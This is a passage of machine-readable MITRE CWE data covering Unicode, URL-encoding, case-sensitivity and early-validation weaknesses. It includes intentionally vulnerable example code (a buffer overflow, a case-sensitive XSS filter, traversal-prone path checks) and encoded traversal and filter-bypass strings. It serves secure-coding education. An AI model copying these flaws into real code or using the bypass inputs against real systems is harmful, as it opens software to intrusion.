encoding.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"172","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Windows provides the MultiByteToWideChar(), WideCharToMultiByte(), UnicodeToBytes(), and BytesToUnicode() functions to convert between arbitrary multibyte (usually ANSI) character strings and Unicode (wide character) strings. The size arguments to these functions are specified in different units, (one in bytes, the other in characters) making their use prone to error.","Body_Text":["In a multibyte character string, each character occupies a varying number of bytes, and therefore the size of such strings is most easily specified as a total number of bytes. In Unicode, however, characters are always a fixed size, and string lengths are typically given by the number of characters they contain. Mistakenly specifying the wrong units in a size argument can lead to a buffer overflow.","The following function takes a username specified as a multibyte string and a pointer to a structure for user information and populates the structure with information about the specified user. Since Windows authentication uses Unicode for usernames, the username argument is first converted from a multibyte string to a Unicode string.","This function incorrectly passes the size of unicodeUser in bytes instead of characters. The call to MultiByteToWideChar() can therefore write up to (UNLEN+1)*sizeof(WCHAR) wide characters, or (UNLEN+1)*sizeof(WCHAR)*sizeof(WCHAR) bytes, to the unicodeUser array, which has only (UNLEN+1)*sizeof(WCHAR) bytes allocated.","If the username string contains more than UNLEN characters, the call to MultiByteToWideChar() will overflow the buffer unicodeUser."],"Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void getUserInfo(char *username, struct _USER_INFO_2 info){}","xhtml:div":{"#text":"WCHAR unicodeUser[UNLEN+1];MultiByteToWideChar(CP_ACP, 0, username, -1, unicodeUser, sizeof(unicodeUser));NetUserGetInfo(NULL, unicodeUser, 2, (LPBYTE *)&info);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0884","Description":"Server allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain Unicode encoded characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0884"},{"Reference":"CVE-2001-0709","Description":"Server allows a remote attacker to obtain source code of ASP files via a URL encoded with Unicode.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0709"},{"Reference":"CVE-2001-0669","Description":"Overlaps interaction error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0669"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unicode Encoding"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC10-C","Entry_Name":"Character Encoding - UTF8 Related Issues"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"71"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "Character Sets and Unicode", Page 446"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Unicode Encoding","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Unicode Encoding","attr":{"@_Date":"2010-12-13"}}]}},"177":{"attr":{"@_ID":"177","@_Name":"Improper Handling of URL Encoding (Hex Encoding)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle when all or part of an input has been URL encoded.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"172","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0900","Description":"Hex-encoded path traversal variants - \\"%2e%2e\\", \\"%2e%2e%2f\\", \\"%5c%2e%2e\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0900"},{"Reference":"CVE-2005-2256","Description":"Hex-encoded path traversal variants - \\"%2e%2e\\", \\"%2e%2e%2f\\", \\"%5c%2e%2e\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2256"},{"Reference":"CVE-2004-2121","Description":"Hex-encoded path traversal variants - \\"%2e%2e\\", \\"%2e%2e%2f\\", \\"%5c%2e%2e\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2121"},{"Reference":"CVE-2004-0280","Description":"\\"%20\\" (encoded space)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0280"},{"Reference":"CVE-2003-0424","Description":"\\"%20\\" (encoded space)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0424"},{"Reference":"CVE-2001-0693","Description":"\\"%20\\" (encoded space)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0693"},{"Reference":"CVE-2001-0778","Description":"\\"%20\\" (encoded space)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0778"},{"Reference":"CVE-2002-1831","Description":"Crash via hex-encoded space \\"%20\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1831"},{"Reference":"CVE-2000-0671","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0671"},{"Reference":"CVE-2004-0189","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0189"},{"Reference":"CVE-2002-1291","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1291"},{"Reference":"CVE-2002-1031","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1031"},{"Reference":"CVE-2001-1140","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1140"},{"Reference":"CVE-2004-0760","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0760"},{"Reference":"CVE-2002-1025","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1025"},{"Reference":"CVE-2002-1213","Description":"\\"%2f\\" (encoded slash)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1213"},{"Reference":"CVE-2004-0072","Description":"\\"%5c\\" (encoded backslash) and \\"%2e\\" (encoded dot) sequences","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0072"},{"Reference":"CVE-2004-0847","Description":"\\"%5c\\" (encoded backslash)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0847"},{"Reference":"CVE-2002-1575","Description":"\\"%0a\\" (overlaps CRLF)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1575"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"URL Encoding (Hex Encoding)"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"468"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"72"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"URL Encoding (Hex Encoding)","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle URL Encoding (Hex Encoding)","attr":{"@_Date":"2010-12-13"}}]}},"178":{"attr":{"@_ID":"178","@_Name":"Improper Handling of Case Sensitivity","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly account for differences in case sensitivity when accessing or determining the properties of a resource, leading to inconsistent results.","Extended_Description":{"xhtml:p":"Improperly handled case sensitive data can lead to several possible consequences, including:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["case-insensitive passwords reducing the size of the key space, making brute force attacks easier","bypassing filters or access controls using alternate names","multiple interpretation errors using alternate names."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"433","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"289","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-141"},"Intro_Text":"In the following example, an XSS neutralization method intends to replace script tags in user-supplied input with a safe equivalent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String preventXSS(String input, String mask) {}","xhtml:div":{"#text":"return input.replaceAll(\\"script\\", mask);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The code only works when the \\"script\\" tag is in all lower-case, forming an incomplete denylist (CWE-184). Equivalent tags such as \\"SCRIPT\\" or \\"ScRiPt\\" will not be neutralized by this method, allowing an XSS attack."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0499","Description":"Application server allows attackers to bypass execution of a jsp page and read the source code using an upper case JSP extension in the request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0499"},{"Reference":"CVE-2000-0497","Description":"The server is case sensitive, so filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype \\"text\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0497"},{"Reference":"CVE-2000-0498","Description":"The server is case sensitive, so filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype \\"text\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0498"},{"Reference":"CVE-2001-0766","Description":"A URL that contains some characters whose case is not matched by the server\'s filters may bypass access restrictions because the case-insensitive file system will then handle the request after it bypasses the case sensitive filter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0766"},{"Reference":"CVE-2001-0795","Description":"Server allows remote attackers to obtain source code of CGI scripts via URLs that contain MS-DOS conventions such as (1) upper case letters or (2) 8.3 file names.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0795"},{"Reference":"CVE-2001-1238","Description":"Task Manager does not allow local users to end processes with uppercase letters named (1) winlogon.exe, (2) csrss.exe, (3) smss.exe and (4) services.exe via the Process tab which could allow local users to install Trojan horses that cannot be stopped.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1238"},{"Reference":"CVE-2003-0411","Description":"chain: Code was ported from a case-sensitive Unix platform to a case-insensitive Windows platform where filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype \\"text\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0411"},{"Reference":"CVE-2002-0485","Description":"Leads to interpretation error","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0485"},{"Reference":"CVE-1999-0239","Description":"Directories may be listed because lower case web requests are not properly handled by the server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0239"},{"Reference":"CVE-2005-0269","Description":"File extension check in forum software only verifies extensions that contain all lowercase letters, which allows remote attackers to upload arbitrary files via file extensions that include uppercase letters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0269"},{"Reference":"CVE-2004-1083","Description":"Web server restricts access to files in a case sensitive manner, but the filesystem accesses files in a case insensitive manner, which allows remote attackers to read privileged files using alternate capitalization.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1083"},{"Reference":"CVE-2002-2119","Description":"Case insensitive passwords lead to search space reduction.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2119"},{"Reference":"CVE-2004-2214","Description":"HTTP server allows bypass of access restrictions using URIs with mixed case.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2214"},{"Reference":"CVE-2004-2154","Description":"Mixed upper/lowercase allows bypass of ACLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2154"},{"Reference":"CVE-2005-4509","Description":"Bypass malicious script detection by using tokens that aren\'t case sensitive.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4509"},{"Reference":"CVE-2002-1820","Description":"Mixed case problem allows \\"admin\\" to have \\"Admin\\" rights (alternate name property).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1820"},{"Reference":"CVE-2007-3365","Description":"Chain: uppercase file extensions causes web server to return script source code instead of executing the script.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3365"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Case Sensitivity (lowercase, uppercase, mixed case)"}},"Notes":{"Note":{"#text":"These are probably under-studied in Windows and Mac environments, where file names are case-insensitive and thus are subject to equivalence manipulations involving case.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Functional_Areas, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Case Sensitivity (Lowercase, Uppercase, Mixed Case)","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Case Sensitivity","attr":{"@_Date":"2010-12-13"}}]}},"179":{"attr":{"@_ID":"179","@_Name":"Incorrect Behavior Order: Early Validation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software validates input before applying protection mechanisms that modify the input, which could allow an attacker to bypass the validation via dangerous inputs that only arise after the modification.","Extended_Description":"Software needs to validate data at the proper time, after data has been canonicalized and cleansed. Early validation is susceptible to various manipulations that result in dangerous inputs that are produced by canonicalization and cleansing.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"696","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Since early validation errors usually arise from improperly implemented defensive mechanisms, it is likely that these will be introduced more frequently as secure programming becomes implemented more widely."}},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity"],"Impact":["Bypass Protection Mechanism","Execute Unauthorized Code or Commands"],"Note":"An attacker could include dangerous input that bypasses validation protection mechanisms which can be used to launch various attacks including injection attacks, execute arbitrary code or cause other unintended behavior."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-35"},"Intro_Text":"The following code attempts to validate a given input path by checking it against an allowlist and then return the canonical path. In this specific case, the path is considered valid if it starts with the string \\"/safe_dir/\\".","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String path = getInputPath();if (path.startsWith(\\"/safe_dir/\\")){}","xhtml:br":["",""],"xhtml:div":{"#text":"File f = new File(path);return f.getCanonicalPath();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"String path = getInputPath();File f = new File(path);if (f.getCanonicalPath().startsWith(\\"/safe_dir/\\")){}","xhtml:br":["","","","",""],"xhtml:div":{"#text":"return f.getCanonicalPath();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["The problem with the above code is that the validation step occurs before canonicalization occurs. An attacker could provide an input path of \\"/safe_dir/../\\" that would pass the validation step. However, the canonicalization process sees the double dot as a traversal to the parent directory and hence when canonicized the path would become just \\"/\\".","To avoid this problem, validation should occur after canonicalization takes place. In this case canonicalization occurs during the initialization of the File object. The code below fixes the issue."]},{"attr":{"@_Demonstrative_Example_ID":"DX-36"},"Intro_Text":"This script creates a subdirectory within a user directory and sets the user as the owner.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function createDir($userName,$dirName){}","xhtml:div":{"#text":"$userDir = \'/users/\'. $userName;if(strpos($dirName,\'..\') !== false){}$dirName = str_replace(\'~\',\'\',$dirName);$newDir = $userDir . $dirName;mkdir($newDir, 0700);chown($newDir,$userName);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""],"xhtml:div":{"#text":"echo \'Directory name contains invalid sequence\';return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:i":"//filter out \'~\' because other scripts identify user directories by this prefix"}}},"Body_Text":"While the script attempts to screen for \'..\' sequences, an attacker can submit a directory path including \\".~.\\", which will then become \\"..\\" after the filtering step. This allows a Path Traversal (CWE-21) attack to occur."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0433","Description":"Product allows remote attackers to view restricted files via an HTTP request containing a \\"*\\" (wildcard or asterisk) 